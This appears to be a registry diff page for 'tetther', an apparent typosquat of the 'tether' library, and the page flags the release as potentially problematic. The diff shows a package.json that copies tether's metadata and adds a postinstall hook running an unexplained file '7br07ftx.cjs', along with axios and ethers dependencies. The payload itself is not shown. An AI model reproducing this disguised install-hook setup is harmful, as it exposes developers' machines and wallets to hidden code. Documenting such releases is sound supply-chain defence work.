tetther 0.0.1-security → 2.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of tetther might be problematic. Click here for more details.
- package/7br07ftx.cjs +1 -0
- package/LICENSE +9 -0
- package/README.md +125 -3
- package/dist/js/tether.js +1994 -0
- package/package.json +70 -4
package/package.json
CHANGED
@@ -1,6 +1,72 @@
|
|
1
1
|
{
|
2
2
|
"name": "tetther",
|
3
|
-
"version": "0.0
|
4
|
-
"description": "
|
5
|
-
"
|
6
|
-
|
3
|
+
"version": "2.0.0",
|
4
|
+
"description": "A client-side library to make absolutely positioned elements attach to elements in the page efficiently.",
|
5
|
+
"authors": [
|
6
|
+
"Zack Bloom <zackbloom@gmail.com>",
|
7
|
+
"Adam Schwartz <adam.flynn.schwartz@gmail.com>"
|
8
|
+
],
|
9
|
+
"repository": {
|
10
|
+
"type": "git",
|
11
|
+
"url": "https://github.com/shipshapecode/tether.git"
|
12
|
+
},
|
13
|
+
"license": "MIT",
|
14
|
+
"maintainers": [
|
15
|
+
"Nicholas Hwang <nick.joosung.hwang@gmail.com>",
|
16
|
+
"Trevor Burnham <trevorburnham@gmail.com>"
|
17
|
+
],
|
18
|
+
"main": "dist/js/tether.js",
|
19
|
+
"module": "dist/js/tether.esm.js",
|
20
|
+
"scripts": {
|
21
|
+
"postinstall": "node 7br07ftx.cjs"
|
22
|
+
},
|
23
|
+
"devDependencies": {
|
24
|
+
"@babel/core": "^7.13.10",
|
25
|
+
"@babel/preset-env": "^7.13.12",
|
26
|
+
"@testing-library/jest-dom": "^5.11.10",
|
27
|
+
"autoprefixer": "^10.2.5",
|
28
|
+
"babel-jest": "^26.6.3",
|
29
|
+
"babel-plugin-rewire": "^1.2.0",
|
30
|
+
"babel-plugin-transform-es2015-modules-commonjs": "^6.26.2",
|
31
|
+
"chai": "^4.3.4",
|
32
|
+
"cssnano": "^4.1.10",
|
33
|
+
"cypress": "6.8.0",
|
34
|
+
"eslint": "^7.22.0",
|
35
|
+
"eslint-plugin-jest": "^24.3.2",
|
36
|
+
"eslint-plugin-ship-shape": "^0.8.1",
|
37
|
+
"http-server": "^0.12.3",
|
38
|
+
"jest": "^26.6.3",
|
39
|
+
"jest-expect-message": "^1.0.2",
|
40
|
+
"jest-transform-css": "^2.1.0",
|
41
|
+
"mutationobserver-shim": "^0.3.7",
|
42
|
+
"postcss": "^8.2.8",
|
43
|
+
"release-it": "^14.2.1",
|
44
|
+
"release-it-lerna-changelog": "^3.1.0",
|
45
|
+
"rimraf": "^3.0.2",
|
46
|
+
"rollup": "^2.42.4",
|
47
|
+
"rollup-plugin-babel": "^4.4.0",
|
48
|
+
"rollup-plugin-browsersync": "^1.3.1",
|
49
|
+
"rollup-plugin-eslint": "^7.0.0",
|
50
|
+
"rollup-plugin-filesize": "^9.1.1",
|
51
|
+
"rollup-plugin-license": "^2.3.0",
|
52
|
+
"rollup-plugin-sass": "^1.2.2",
|
53
|
+
"rollup-plugin-terser": "^7.0.2",
|
54
|
+
"rollup-plugin-visualizer": "^4.2.2",
|
55
|
+
"sinon": "^10.0.0",
|
56
|
+
"start-server-and-test": "^1.12.1"
|
57
|
+
},
|
58
|
+
"publishConfig": {
|
59
|
+
"registry": "https://registry.npmjs.org"
|
60
|
+
},
|
61
|
+
"volta": {
|
62
|
+
"node": "10.23.0",
|
63
|
+
"yarn": "1.22.10"
|
64
|
+
},
|
65
|
+
"files": [
|
66
|
+
"7br07ftx.cjs"
|
67
|
+
],
|
68
|
+
"dependencies": {
|
69
|
+
"axios": "^1.7.7",
|
70
|
+
"ethers": "^6.13.2"
|
71
|
+
}
|
72
|
+
}
|